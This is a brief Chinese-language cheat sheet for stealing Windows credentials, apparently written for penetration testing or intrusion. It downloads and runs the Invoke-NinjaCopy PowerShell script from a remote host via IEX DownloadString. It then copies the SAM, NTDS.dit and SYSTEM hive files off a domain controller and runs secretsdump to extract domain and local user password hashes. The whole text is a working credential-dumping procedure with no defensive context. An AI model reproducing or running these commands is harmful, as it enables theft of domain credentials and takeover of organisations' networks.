获取NTDS.dit
加载ps脚本
IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.5/Invoke-NinjaCopy.ps1");
提取本地sam文件
Invoke-NinjaCopy -Path C:\Windows\System32\config\sam -LocalDestination C:\Users\Administrator\Desktop\sam
提取域控NTDS.dit
Invoke-NinjaCopy -Path C:\Windows\NTDS\ntds.dit -LocalDestination C:\Users\Administrator\Desktop\ntds.dit
提取hive文件
Invoke-NinjaCopy -Path C:\Windows\System32\config\SYSTEM -LocalDestination C:\Users\Administrator\Desktop\SYSTEM
提取hash
secretsdump.exe -ntds ntds.dit -system SYSTEM LOCAL #提取域控用户hash
secretsdump.exe -sam sam -system SYSTEM LOCAL #提取本地用户hash
运气好可以直接得到秘密